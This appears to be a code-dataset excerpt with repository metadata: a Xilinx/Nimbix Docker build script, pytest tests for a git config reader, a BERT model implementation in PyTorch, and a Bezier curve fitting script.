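b = make_set([3])
print(bool(a & b))              # True: both bit vectors have object 3's bit set
make_set.free_objects(a)        # decrement the table's reference counts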
e87cce78dea332042a68f4be41eba0d8f1e51b57 | 7,079 | py | Python | nimbix.py | bttu/Containerization | 0e4b5f48f0c43e83a5667f36069f2d94aa845e38 | [
"Apache-2.0"
] | 1 | 2021-09-01T15:43:07.000Z | 2021-09-01T15:43:07.000Z | nimbix.py | bttu/Containerization | 0e4b5f48f0c43e83a5667f36069f2d94aa845e38 | [
"Apache-2.0"
] | null | null | null | nimbix.py | bttu/Containerization | 0e4b5f48f0c43e83a5667f36069f2d94aa845e38 | [
"Apache-2.0"
] | 5 | 2020-06-14T10:15:24.000Z | 2021-11-25T10:51:58.000Z | #!/usr/bin/env python
import json
import subprocess
import os
import sys
import datetime
import shutil, errno
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('-path', help = 'the config file path, default as config.json')
args = parser.parse_args()
def copyanything(src, dst):
try:
shutil.copytree(src, dst)
except OSError as exc: # python >2.5
if exc.errno == errno.ENOTDIR:
shutil.copy(src, dst)
else: raise
def list_tags() :
sys.exit("XRT and platform do NOT match! \
Available platform and XRT combination:\
\
Platform XRT Version OS Version\
alveo-u200 2018.3 /2019.1 / 2019.2 / 2020.1 Ubuntu 16.04 / Ubuntu 18.04 / CentOS\
alveo-u250 2018.3 /2019.1 / 2019.2 / 2020.1 Ubuntu 16.04 / Ubuntu 18.04 / CentOS\
alveo-u280 2019.2 / 2020.1 Ubuntu 16.04 / Ubuntu 18.04 / CentOS\
alveo-u50 2019.2 / 2020.1 Ubuntu 16.04 / Ubuntu 18.04 / CentOS")
if args.path:
with open(args.path) as d:
repos = json.load(d)
else:
with open('config.json') as d:
repos = json.load(d)
vendor = repos['vendor']
metadata = repos['metadata']
provisioners = repos['provisioners']
app_info = repos['app_info']
post_processors = repos['post_processors']
example_path = "examples/nimbix/"
if vendor != "nimbix":
sys.exit("Vendor is NOT supported! ")
with open(example_path+'AppDef.json.example') as d:
appdef = json.load(d)
if not metadata['app_name']:
sys.exit("Application name can NOT be empty!")
if not app_info['os_version']:
sys.exit("OS version can NOT be empty!")
if not app_info['xrt_version']:
sys.exit("XRT version can NOT be empty!")
if not app_info['platform']:
sys.exit("Platform can NOT be empty!")
if not post_processors['repository']:
sys.exit("Repository can NOT be empty!")
if not post_processors['tag']:
sys.exit("Tag can NOT be empty!")
internal = False
if "internal" in metadata and metadata['internal']:
internal = True
with open('spec.json') as d:
spec = json.load(d)
commands = []
labels = {}
# Xilinx Base Runtim Image Url
image_url = ""
target_platforms = []
if internal:
image_url = "xdock.xilinx.com/base_runtime:" + post_processors['tag'] + "-" + app_info['os_version']
else:
if app_info['os_version'] in spec['os_version']:
if app_info['xrt_version'] in spec['os_version'][app_info['os_version']]['xrt_version']:
image_url = "xilinx/xilinx_runtime_base:" + "alveo" + "-" + app_info['xrt_version'] + "-" + app_info['os_version']
for platform in app_info['platform']:
if platform in spec['os_version'][app_info['os_version']]['xrt_version'][app_info['xrt_version']]['platform']:
target_platforms.append(spec['os_version'][app_info['os_version']]['xrt_version'][app_info['xrt_version']]['platform'][platform])
if platform == "alveo-u50" and app_info['xrt_version'] == "2019.2":
image_url += "-u50"
commands.append("ENV INTERNAL_BUILD=1")
else:
print(" [Warning] Invalide platform: " + platform)
if not image_url:
list_tags()
dockerfile_example = example_path + ("Dockerfile_Centos.example" if app_info['os_version'] == "centos" else "Dockerfile_Ubuntu.example")
timestamp = datetime.datetime.now().strftime("%Y%m%d%H%M%S")
path = "build_history/" + timestamp
try:
os.mkdir(path)
shutil.copy(example_path+'help.html.example', path + "/help.html")
shutil.copy(example_path+'xilinx_runtime.sh.example', path + "/xilinx_runtime.sh")
except OSError:
sys.exit("[Error]: Can NOT create folder " + path)
for pro in provisioners:
ctype = pro['type']
if ctype == 'shell':
commands.append("RUN " + " && ".join(pro['inline']))
elif ctype == 'file':
if not os.path.exists(pro['source']):
sys.exit(pro['source'] + " does NOT exists!")
filename = os.path.basename(os.path.normpath(pro['destination']))
copyanything(pro['source'], path + "/" + filename)
commands.append("COPY " + filename + " " + pro['destination'])
elif ctype == 'label':
labels[pro['key']] = pro['value']
else:
print("Warning: Unknown type: " + ctype + "! ")
if "app_cover_image" in metadata:
app_cover_image = metadata["app_cover_image"]
if not os.path.exists(app_cover_image):
print("[Warning]: " + app_cover_image + " is not exists! ")
elif not app_cover_image.lower().endswith('.png'):
print("[Warning]: Cover image must be PNG image! Skip adding cover image! ")
else:
copyanything(app_cover_image, path + "/" + "screenshot.png")
commands.append("COPY screenshot.png /etc/NAE/screenshot.png")
commands.append("RUN chmod 644 /etc/NAE/screenshot.png")
if "app_license" in metadata:
app_license = metadata["app_license"]
if not os.path.exists(app_license):
print("[Warning]: " + app_license + " is not exists! ")
elif not app_license.lower().endswith('.txt'):
print("[Warning]: License file must be txt file! Skip adding license file! ")
else:
copyanything(app_license, path + "/" + "license.txt")
commands.append("COPY license.txt /etc/NAE/license.txt")
with open(dockerfile_example, "r") as f:
s = f.read()
s = s.replace("__from_image__", image_url)
with open(path + "/Dockerfile", "w") as d:
d.write(s)
for command in commands:
d.write(command + "\n")
if labels:
label_str = 'LABEL '
for key in labels:
label_str += key + '="' + labels[key] + '" '
d.write(label_str + "\n")
appdef['name'] = metadata['app_name']
appdef['description'] = metadata['app_description']
if not metadata['desktop_mode']:
del appdef['commands']['server']
if not metadata['batch_mode']:
del appdef['commands']['batch']
appdef["machines"] = metadata["machines"]
for target_platform in target_platforms:
if target_platform not in appdef['machines']:
appdef['machines'].append(target_platform)
with open(path + '/AppDef.json', "w") as d:
json.dump(appdef, d, indent=4)
# Build the application image
print("Build docker image: " + post_processors['repository'] + ":" + post_processors["tag"])
subprocess.check_call(
"docker build -t " + post_processors['repository'] + ":" + post_processors["tag"] + " " + path,
stderr=subprocess.STDOUT, shell=True)
if post_processors['push_after_build']:
print("docker push " + post_processors['repository'] + ":" + post_processors["tag"])
subprocess.check_call("docker push " + post_processors['repository'] + ":" + post_processors["tag"],
stderr=subprocess.STDOUT, shell=True)
else:
print("Push docker image by running:")
print(" docker push " + post_processors['repository'] + ":" + post_processors["tag"])
print("Build history: " + path)
print("Build successfully!")
exit(0)
| 35.93401 | 149 | 0.63314 | 927 | 7,079 | 4.700108 | 0.212513 | 0.028919 | 0.016525 | 0.029378 | 0.257058 | 0.2084 | 0.172366 | 0.172366 | 0.141611 | 0.110627 | 0 | 0.021598 | 0.215143 | 7,079 | 196 | 150 | 36.117347 | 0.762599 | 0.011019 | 0 | 0.09434 | 0 | 0.025157 | 0.268687 | 0.025439 | 0.006289 | 0 | 0 | 0 | 0 | 1 | 0.012579 | false | 0 | 0.044025 | 0 | 0.056604 | 0.075472 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e87eec95baa5133ac04a6e1c623bd5692ffa3a78 | 2,509 | py | Python | tests/test_git.py | wildfish/sphinx-gitref | 882b46441b5330206b68883b7f25ebb902abc8e7 | [
"BSD-3-Clause"
] | 5 | 2020-06-26T15:42:47.000Z | 2022-03-19T16:31:06.000Z | tests/test_git.py | wildfish/sphinx-gitref | 882b46441b5330206b68883b7f25ebb902abc8e7 | [
"BSD-3-Clause"
] | 7 | 2020-08-11T14:27:52.000Z | 2022-03-21T15:54:41.000Z | tests/test_git.py | wildfish/sphinx-gitref | 882b46441b5330206b68883b7f25ebb902abc8e7 | [
"BSD-3-Clause"
] | 1 | 2022-03-21T15:54:53.000Z | 2022-03-21T15:54:53.000Z | """
Check local repo management
"""
import pytest
from sphinx_gitref.git import Repo
from .common import GIT_CONFIG
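# The paths fixture below fakes a .git directory layout inside pytest's tmp_path.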
@pytest.fixture()
def paths(tmp_path):
class paths:
root = tmp_path
# Git
git = tmp_path / ".git"
config = tmp_path / ".git" / "config"
head = tmp_path / ".git" / "HEAD"
paths.git.mkdir()
return paths
def test_dir_does_not_exist__fails_silently(paths):
paths.git.rmdir()
repo = Repo(paths.git)
assert repo.path is None
assert repo.get_remote_url() is None
assert repo.get_local_branch() is None
def test_config_does_not_exist__fails_silently(paths):
repo = Repo(paths.git)
assert repo.path == paths.git
assert repo.get_remote_url() is None
def test_head_does_not_exist__fails_silently(paths):
repo = Repo(paths.git)
assert repo.path == paths.git
assert repo.get_local_branch() is None
def test_config_exists__origin_found(paths):
paths.config.write_text(GIT_CONFIG)
repo = Repo(paths.git)
assert repo.get_remote_url() == "git@github.com:wildfish/sphinx_gitref.git"
def test_config_valid_with_non_github_origin__origin_found(paths):
paths.config.write_text(GIT_CONFIG.replace("github.com", "example.com"))
repo = Repo(paths.git)
assert repo.get_remote_url() == "git@example.com:wildfish/sphinx_gitref.git"
def test_config_valid_but_with_unknown_origin__fails_silently(paths):
paths.config.write_text(
u"""[core]
repositoryformatversion = 0
filemode = true
bare = false
logallrefupdates = true
[branch "master"]
remote = origin
merge = refs/heads/master
"""
)
repo = Repo(paths.git)
assert repo.get_remote_url() is None
def test_config_invalid__fails_loudly(paths):
try:
from configparser import MissingSectionHeaderError
except ImportError:
from ConfigParser import MissingSectionHeaderError
paths.config.write_text(u"invalid")
repo = Repo(paths.git)
with pytest.raises(MissingSectionHeaderError):
repo.get_remote_url()
def test_head_invalid__fails_silently(paths):
paths.config.write_text(GIT_CONFIG)
paths.head.write_text(u"invalid\n")
repo = Repo(paths.git)
assert repo.get_local_branch() is None
def test_head_valid__returns_branch_name(paths):
paths.config.write_text(GIT_CONFIG)
paths.head.write_text(u"ref: refs/heads/master\n")
repo = Repo(paths.git)
assert repo.get_local_branch() == "master"
| 25.602041 | 80 | 0.707852 | 344 | 2,509 | 4.872093 | 0.223837 | 0.062053 | 0.083532 | 0.107399 | 0.572196 | 0.547136 | 0.529236 | 0.474344 | 0.444511 | 0.403938 | 0 | 0.000494 | 0.192507 | 2,509 | 97 | 81 | 25.865979 | 0.826752 | 0.012754 | 0 | 0.338983 | 0 | 0 | 0.075871 | 0.036612 | 0 | 0 | 0 | 0 | 0.20339 | 1 | 0.169492 | false | 0 | 0.101695 | 0 | 0.372881 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e87f6f5da0627ec3f2dddacf104d617ea49c7ca2 | 16,502 | py | Python | fastNLP/models/bert.py | awesome-archive/fastNLP | 767e7971e542783c0129ed88b7d871db775e653e | [
"Apache-2.0"
] | 1 | 2019-04-26T07:54:34.000Z | 2019-04-26T07:54:34.000Z | fastNLP/models/bert.py | machao326/fastNLP | 0f8bed739c71e3f834f213e45dc1694f8b61e74d | [
"Apache-2.0"
] | null | null | null | fastNLP/models/bert.py | machao326/fastNLP | 0f8bed739c71e3f834f213e45dc1694f8b61e74d | [
"Apache-2.0"
] | null | null | null | """
bert.py is modified from huggingface/pytorch-pretrained-BERT, which is licensed under the Apache License 2.0.
"""
import copy
import json
import math
import os
import torch
from torch import nn
CONFIG_FILE = 'bert_config.json'
MODEL_WEIGHTS = 'pytorch_model.bin'
def gelu(x):
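    # Exact GELU activation (Hendrycks & Gimpel, 2016) computed via the Gaussian error function.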
return x * 0.5 * (1.0 + torch.erf(x / math.sqrt(2.0)))
def swish(x):
return x * torch.sigmoid(x)
ACT2FN = {"gelu": gelu, "relu": torch.nn.functional.relu, "swish": swish}
class BertLayerNorm(nn.Module):
def __init__(self, hidden_size, eps=1e-12):
super(BertLayerNorm, self).__init__()
self.weight = nn.Parameter(torch.ones(hidden_size))
self.bias = nn.Parameter(torch.zeros(hidden_size))
self.variance_epsilon = eps
def forward(self, x):
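        # Normalize over the last dimension, then apply the learned scale (weight) and shift (bias).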
u = x.mean(-1, keepdim=True)
s = (x - u).pow(2).mean(-1, keepdim=True)
x = (x - u) / torch.sqrt(s + self.variance_epsilon)
return self.weight * x + self.bias
class BertEmbeddings(nn.Module):
def __init__(self, vocab_size, hidden_size, max_position_embeddings, type_vocab_size, hidden_dropout_prob):
super(BertEmbeddings, self).__init__()
self.word_embeddings = nn.Embedding(vocab_size, hidden_size)
self.position_embeddings = nn.Embedding(max_position_embeddings, hidden_size)
self.token_type_embeddings = nn.Embedding(type_vocab_size, hidden_size)
# self.LayerNorm is not snake-cased to stick with TensorFlow model variable name and be able to load
# any TensorFlow checkpoint file
self.LayerNorm = BertLayerNorm(hidden_size, eps=1e-12)
self.dropout = nn.Dropout(hidden_dropout_prob)
def forward(self, input_ids, token_type_ids=None):
seq_length = input_ids.size(1)
position_ids = torch.arange(seq_length, dtype=torch.long, device=input_ids.device)
position_ids = position_ids.unsqueeze(0).expand_as(input_ids)
if token_type_ids is None:
token_type_ids = torch.zeros_like(input_ids)
words_embeddings = self.word_embeddings(input_ids)
position_embeddings = self.position_embeddings(position_ids)
token_type_embeddings = self.token_type_embeddings(token_type_ids)
embeddings = words_embeddings + position_embeddings + token_type_embeddings
embeddings = self.LayerNorm(embeddings)
embeddings = self.dropout(embeddings)
return embeddings
class BertSelfAttention(nn.Module):
def __init__(self, hidden_size, num_attention_heads, attention_probs_dropout_prob):
super(BertSelfAttention, self).__init__()
if hidden_size % num_attention_heads != 0:
raise ValueError(
"The hidden size (%d) is not a multiple of the number of attention "
"heads (%d)" % (hidden_size, num_attention_heads))
self.num_attention_heads = num_attention_heads
self.attention_head_size = int(hidden_size / num_attention_heads)
self.all_head_size = self.num_attention_heads * self.attention_head_size
self.query = nn.Linear(hidden_size, self.all_head_size)
self.key = nn.Linear(hidden_size, self.all_head_size)
self.value = nn.Linear(hidden_size, self.all_head_size)
self.dropout = nn.Dropout(attention_probs_dropout_prob)
def transpose_for_scores(self, x):
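        # Reshape (batch, seq_len, all_head_size) -> (batch, num_heads, seq_len, head_size).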
new_x_shape = x.size()[:-1] + (self.num_attention_heads, self.attention_head_size)
x = x.view(*new_x_shape)
return x.permute(0, 2, 1, 3)
def forward(self, hidden_states, attention_mask):
mixed_query_layer = self.query(hidden_states)
mixed_key_layer = self.key(hidden_states)
mixed_value_layer = self.value(hidden_states)
query_layer = self.transpose_for_scores(mixed_query_layer)
key_layer = self.transpose_for_scores(mixed_key_layer)
value_layer = self.transpose_for_scores(mixed_value_layer)
# Take the dot product between "query" and "key" to get the raw attention scores.
attention_scores = torch.matmul(query_layer, key_layer.transpose(-1, -2))
attention_scores = attention_scores / math.sqrt(self.attention_head_size)
# Apply the attention mask is (precomputed for all layers in BertModel forward() function)
attention_scores = attention_scores + attention_mask
# Normalize the attention scores to probabilities.
attention_probs = nn.Softmax(dim=-1)(attention_scores)
# This is actually dropping out entire tokens to attend to, which might
# seem a bit unusual, but is taken from the original Transformer paper.
attention_probs = self.dropout(attention_probs)
context_layer = torch.matmul(attention_probs, value_layer)
context_layer = context_layer.permute(0, 2, 1, 3).contiguous()
new_context_layer_shape = context_layer.size()[:-2] + (self.all_head_size,)
context_layer = context_layer.view(*new_context_layer_shape)
return context_layer
class BertSelfOutput(nn.Module):
def __init__(self, hidden_size, hidden_dropout_prob):
super(BertSelfOutput, self).__init__()
self.dense = nn.Linear(hidden_size, hidden_size)
self.LayerNorm = BertLayerNorm(hidden_size, eps=1e-12)
self.dropout = nn.Dropout(hidden_dropout_prob)
def forward(self, hidden_states, input_tensor):
hidden_states = self.dense(hidden_states)
hidden_states = self.dropout(hidden_states)
hidden_states = self.LayerNorm(hidden_states + input_tensor)
return hidden_states
class BertAttention(nn.Module):
def __init__(self, hidden_size, num_attention_heads, attention_probs_dropout_prob, hidden_dropout_prob):
super(BertAttention, self).__init__()
self.self = BertSelfAttention(hidden_size, num_attention_heads, attention_probs_dropout_prob)
self.output = BertSelfOutput(hidden_size, hidden_dropout_prob)
def forward(self, input_tensor, attention_mask):
self_output = self.self(input_tensor, attention_mask)
attention_output = self.output(self_output, input_tensor)
return attention_output
class BertIntermediate(nn.Module):
def __init__(self, hidden_size, intermediate_size, hidden_act):
super(BertIntermediate, self).__init__()
self.dense = nn.Linear(hidden_size, intermediate_size)
self.intermediate_act_fn = ACT2FN[hidden_act] \
if isinstance(hidden_act, str) else hidden_act
def forward(self, hidden_states):
hidden_states = self.dense(hidden_states)
hidden_states = self.intermediate_act_fn(hidden_states)
return hidden_states
class BertOutput(nn.Module):
def __init__(self, hidden_size, intermediate_size, hidden_dropout_prob):
super(BertOutput, self).__init__()
self.dense = nn.Linear(intermediate_size, hidden_size)
self.LayerNorm = BertLayerNorm(hidden_size, eps=1e-12)
self.dropout = nn.Dropout(hidden_dropout_prob)
def forward(self, hidden_states, input_tensor):
hidden_states = self.dense(hidden_states)
hidden_states = self.dropout(hidden_states)
hidden_states = self.LayerNorm(hidden_states + input_tensor)
return hidden_states
class BertLayer(nn.Module):
def __init__(self, hidden_size, num_attention_heads, attention_probs_dropout_prob, hidden_dropout_prob,
intermediate_size, hidden_act):
super(BertLayer, self).__init__()
self.attention = BertAttention(hidden_size, num_attention_heads, attention_probs_dropout_prob,
hidden_dropout_prob)
self.intermediate = BertIntermediate(hidden_size, intermediate_size, hidden_act)
self.output = BertOutput(hidden_size, intermediate_size, hidden_dropout_prob)
def forward(self, hidden_states, attention_mask):
attention_output = self.attention(hidden_states, attention_mask)
intermediate_output = self.intermediate(attention_output)
layer_output = self.output(intermediate_output, attention_output)
return layer_output
class BertEncoder(nn.Module):
def __init__(self, num_hidden_layers, hidden_size, num_attention_heads, attention_probs_dropout_prob,
hidden_dropout_prob,
intermediate_size, hidden_act):
super(BertEncoder, self).__init__()
layer = BertLayer(hidden_size, num_attention_heads, attention_probs_dropout_prob, hidden_dropout_prob,
intermediate_size, hidden_act)
self.layer = nn.ModuleList([copy.deepcopy(layer) for _ in range(num_hidden_layers)])
def forward(self, hidden_states, attention_mask, output_all_encoded_layers=True):
all_encoder_layers = []
for layer_module in self.layer:
hidden_states = layer_module(hidden_states, attention_mask)
if output_all_encoded_layers:
all_encoder_layers.append(hidden_states)
if not output_all_encoded_layers:
all_encoder_layers.append(hidden_states)
return all_encoder_layers
class BertPooler(nn.Module):
def __init__(self, hidden_size):
super(BertPooler, self).__init__()
self.dense = nn.Linear(hidden_size, hidden_size)
self.activation = nn.Tanh()
def forward(self, hidden_states):
# We "pool" the model by simply taking the hidden state corresponding
# to the first token.
first_token_tensor = hidden_states[:, 0]
pooled_output = self.dense(first_token_tensor)
pooled_output = self.activation(pooled_output)
return pooled_output
class BertModel(nn.Module):
"""Bidirectional Embedding Representations from Transformers.
If you want to use pre-trained weights, please download from the following sources provided by pytorch-pretrained-BERT.
sources::
'bert-base-uncased': "https://s3.amazonaws.com/models.huggingface.co/bert/bert-base-uncased.tar.gz",
'bert-large-uncased': "https://s3.amazonaws.com/models.huggingface.co/bert/bert-large-uncased.tar.gz",
'bert-base-cased': "https://s3.amazonaws.com/models.huggingface.co/bert/bert-base-cased.tar.gz",
'bert-large-cased': "https://s3.amazonaws.com/models.huggingface.co/bert/bert-large-cased.tar.gz",
'bert-base-multilingual-uncased': "https://s3.amazonaws.com/models.huggingface.co/bert/bert-base-multilingual-uncased.tar.gz",
'bert-base-multilingual-cased': "https://s3.amazonaws.com/models.huggingface.co/bert/bert-base-multilingual-cased.tar.gz",
'bert-base-chinese': "https://s3.amazonaws.com/models.huggingface.co/bert/bert-base-chinese.tar.gz",
Construct a BERT model with pre-trained weights::
model = BertModel.from_pretrained("path/to/weights/directory")
"""
def __init__(self, vocab_size,
hidden_size=768,
num_hidden_layers=12,
num_attention_heads=12,
intermediate_size=3072,
hidden_act="gelu",
hidden_dropout_prob=0.1,
attention_probs_dropout_prob=0.1,
max_position_embeddings=512,
type_vocab_size=2,
initializer_range=0.02, **kwargs):
super(BertModel, self).__init__()
self.embeddings = BertEmbeddings(vocab_size, hidden_size, max_position_embeddings,
type_vocab_size, hidden_dropout_prob)
self.encoder = BertEncoder(num_hidden_layers, hidden_size, num_attention_heads,
attention_probs_dropout_prob, hidden_dropout_prob, intermediate_size,
hidden_act)
self.pooler = BertPooler(hidden_size)
self.initializer_range = initializer_range
self.apply(self.init_bert_weights)
def init_bert_weights(self, module):
if isinstance(module, (nn.Linear, nn.Embedding)):
# Slightly different from the TF version which uses truncated_normal for initialization
# cf https://github.com/pytorch/pytorch/pull/5617
module.weight.data.normal_(mean=0.0, std=self.initializer_range)
elif isinstance(module, BertLayerNorm):
module.bias.data.zero_()
module.weight.data.fill_(1.0)
if isinstance(module, nn.Linear) and module.bias is not None:
module.bias.data.zero_()
def forward(self, input_ids, token_type_ids=None, attention_mask=None, output_all_encoded_layers=True):
if attention_mask is None:
attention_mask = torch.ones_like(input_ids)
if token_type_ids is None:
token_type_ids = torch.zeros_like(input_ids)
# We create a 3D attention mask from a 2D tensor mask.
# Sizes are [batch_size, 1, 1, to_seq_length]
# So we can broadcast to [batch_size, num_heads, from_seq_length, to_seq_length]
# this attention mask is more simple than the triangular masking of causal attention
# used in OpenAI GPT, we just need to prepare the broadcast dimension here.
extended_attention_mask = attention_mask.unsqueeze(1).unsqueeze(2)
# Since attention_mask is 1.0 for positions we want to attend and 0.0 for
# masked positions, this operation will create a tensor which is 0.0 for
# positions we want to attend and -10000.0 for masked positions.
# Since we are adding it to the raw scores before the softmax, this is
# effectively the same as removing these entirely.
extended_attention_mask = extended_attention_mask.to(dtype=next(self.parameters()).dtype) # fp16 compatibility
extended_attention_mask = (1.0 - extended_attention_mask) * -10000.0
embedding_output = self.embeddings(input_ids, token_type_ids)
encoded_layers = self.encoder(embedding_output,
extended_attention_mask,
output_all_encoded_layers=output_all_encoded_layers)
sequence_output = encoded_layers[-1]
pooled_output = self.pooler(sequence_output)
if not output_all_encoded_layers:
encoded_layers = encoded_layers[-1]
return encoded_layers, pooled_output
@classmethod
def from_pretrained(cls, pretrained_model_dir, state_dict=None, *inputs, **kwargs):
# Load config
config_file = os.path.join(pretrained_model_dir, CONFIG_FILE)
config = json.load(open(config_file, "r"))
# config = BertConfig.from_json_file(config_file)
# logger.info("Model config {}".format(config))
# Instantiate model.
model = cls(*inputs, **config, **kwargs)
if state_dict is None:
weights_path = os.path.join(pretrained_model_dir, MODEL_WEIGHTS)
state_dict = torch.load(weights_path)
old_keys = []
new_keys = []
for key in state_dict.keys():
new_key = None
if 'gamma' in key:
new_key = key.replace('gamma', 'weight')
if 'beta' in key:
new_key = key.replace('beta', 'bias')
if new_key:
old_keys.append(key)
new_keys.append(new_key)
for old_key, new_key in zip(old_keys, new_keys):
state_dict[new_key] = state_dict.pop(old_key)
missing_keys = []
unexpected_keys = []
error_msgs = []
# copy state_dict so _load_from_state_dict can modify it
metadata = getattr(state_dict, '_metadata', None)
state_dict = state_dict.copy()
if metadata is not None:
state_dict._metadata = metadata
def load(module, prefix=''):
local_metadata = {} if metadata is None else metadata.get(prefix[:-1], {})
module._load_from_state_dict(
state_dict, prefix, local_metadata, True, missing_keys, unexpected_keys, error_msgs)
for name, child in module._modules.items():
if child is not None:
load(child, prefix + name + '.')
load(model, prefix='' if hasattr(model, 'bert') else 'bert.')
if len(missing_keys) > 0:
print("Weights of {} not initialized from pretrained model: {}".format(
model.__class__.__name__, missing_keys))
if len(unexpected_keys) > 0:
print("Weights from pretrained model not used in {}: {}".format(
model.__class__.__name__, unexpected_keys))
return model
| 45.460055 | 130 | 0.682705 | 2,084 | 16,502 | 5.099808 | 0.162668 | 0.038577 | 0.025593 | 0.02277 | 0.387279 | 0.33694 | 0.292153 | 0.260726 | 0.239838 | 0.214057 | 0 | 0.008793 | 0.228154 | 16,502 | 362 | 131 | 45.585635 | 0.825626 | 0.165919 | 0 | 0.144 | 0 | 0 | 0.020257 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.112 | false | 0 | 0.024 | 0.008 | 0.24 | 0.008 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e888a99a1b09352657478ab95875d5c3214b8a31 | 3,597 | py | Python | Yan/code/Bezier/Bezier_n.py | william-yan/CSU_notes | c2b7fb3dea5a6435bf9dbadaad479b06c9297fcb | [
"MIT"
] | null | null | null | Yan/code/Bezier/Bezier_n.py | william-yan/CSU_notes | c2b7fb3dea5a6435bf9dbadaad479b06c9297fcb | [
"MIT"
] | null | null | null | Yan/code/Bezier/Bezier_n.py | william-yan/CSU_notes | c2b7fb3dea5a6435bf9dbadaad479b06c9297fcb | [
"MIT"
] | 2 | 2019-04-26T02:50:00.000Z | 2019-04-28T13:53:48.000Z | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Apr 25 16:40:54 2019
@author: self-driver
"""
import numpy as np
from matplotlib import pyplot as plt
import Bezier
def bezier_n_curve(points, n, nTimes=1000):
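    # Piecewise Bezier fit: walk the control points in windows of n+1 points and
    # evaluate each window with Bezier.bezier_curve.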
#print("points is : \n",points)
#print(" n is : ",n)
np.set_printoptions(formatter={'float': '{: 0.3f}'.format})
print("points is : \n",points)
nPoints = len(points)
count = 0
if((nPoints - 1)%n):
count = n - (nPoints - 1)%n
print('count is : ',count)
# insert Point
'''
while(count):
points_insert = points[-1]+(points[-1]-points[-2])*0.1*count
points = np.insert(points,len(points),values=points_insert, axis=0)
count = count - 1
'''
    result = np.transpose(points)
    result_D = np.transpose(points)
D = [0]
for i in range(0,len(points)-1,n):
end_selesct = i+n+1
Path_selct = points[i:end_selesct]
#print("Path_selct before is : \n",Path_selct)
'''
if (i+n+2) < (len(points)):
point_insert_front = (points[i] + points[i+1])/2
point_insert_rear = (Path_selct[-1] + Path_selct[-2])/2
x = point_insert_rear[0]
x1 = points[end_selesct-1][0]
x2 = points[end_selesct][0]
y1 = points[end_selesct-1][1]
y2 = points[end_selesct][1]
point_insert_rear[1] = (y2-y1)/(x2-x1)*(x-x1) + y1
Path_selct = np.insert(Path_selct,1,values=point_insert_front, axis=0)
Path_selct = np.insert(Path_selct,-1,values=point_insert_rear, axis=0)
else:
point_insert_front = (points[i] + points[i+1])/2
point_insert_rear = (Path_selct[-1] + Path_selct[-2])/2
Path_selct = np.insert(Path_selct,1,values=point_insert_front, axis=0)
Path_selct = np.insert(Path_selct,-1,values=point_insert_rear, axis=0)
'''
tempresult = Bezier.bezier_curve(Path_selct,nTimes)
tempresult_D1 = np.array([Bezier.bezier_curve(Path_selct[:-2],nTimes)])
tempresult_D2 = np.array([Bezier.bezier_curve(Path_selct[1:],nTimes)])
tempresult_D = tempresult_D2 - tempresult_D1
print("tempresult_D.shape",tempresult_D.shape)
        for j in range(100):
            D.append(tempresult_D[0][1][j]/tempresult_D[0][0][j])  # slope dy/dx
result = np.c_[result,tempresult]
result_D = np.append(result_D,tempresult_D)
print("Path_selct\n",Path_selct)
#print("Path_selct_D\n",Path_select_D)
x_re = result[0][len(points):-1]
y_re = result[1][len(points):-1]
print("D is : \n",result_D)
plt.figure(2)
#D = np.array(bezierPoint[2])
plt.plot(D[1:],'k.')
print("x_re.shape",x_re.shape)
#print("D.shape",D.shape)
return x_re,y_re,D[1:]
if __name__ == "__main__":
a0 = 1
a1 = 0.5
a2 = -0.01
a3 = 0.000001
x = np.linspace(0,20,10)
y = a0 + a1 * x + a2 * x**2 + a3 * x ** 3
Path = np.array([x,y])
Path = np.transpose(Path)
n = 10
bezierPoint = bezier_n_curve(Path, n, 100)
plt.figure(1)
plt.plot(x,y,'ro')
plt.axis("equal")
plt.plot(bezierPoint[0],bezierPoint[1],'r.')
Path_D= np.array([bezierPoint[0]])
Path_D = a1 + 2 * a2 * bezierPoint[0] + 3 * a3 *bezierPoint[0]**2
plt.figure(2)
#D = np.array(bezierPoint[2])
#print(bezierPoint[2])
#plt.plot(bezierPoint[0], D,'k.')
plt.plot(bezierPoint[0],Path_D,'r.')
| 29.483607 | 82 | 0.565749 | 528 | 3,597 | 3.679924 | 0.200758 | 0.097272 | 0.036027 | 0.034997 | 0.293361 | 0.244982 | 0.244982 | 0.211014 | 0.180134 | 0.180134 | 0 | 0.054219 | 0.271893 | 3,597 | 121 | 83 | 29.727273 | 0.687667 | 0.107312 | 0 | 0.037736 | 0 | 0 | 0.052838 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.018868 | false | 0 | 0.056604 | 0 | 0.09434 | 0.132075 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e88a075f5e5b1b0ce9438ee6f40cae107e654a0d | 9,835 | py | Python | deepmath/deephol/utilities/proof_analysis.py | LaudateCorpus1/deepmath | b5b721f54de1d5d6a02d78f5da5995237f9995f9 | [
"Apache-2.0"
] | 830 | 2016-11-07T21:46:27.000Z | 2022-03-23T08:01:03.000Z | deepmath/deephol/utilities/proof_analysis.py | LaudateCorpus1/deepmath | b5b721f54de1d5d6a02d78f5da5995237f9995f9 | [
"Apache-2.0"
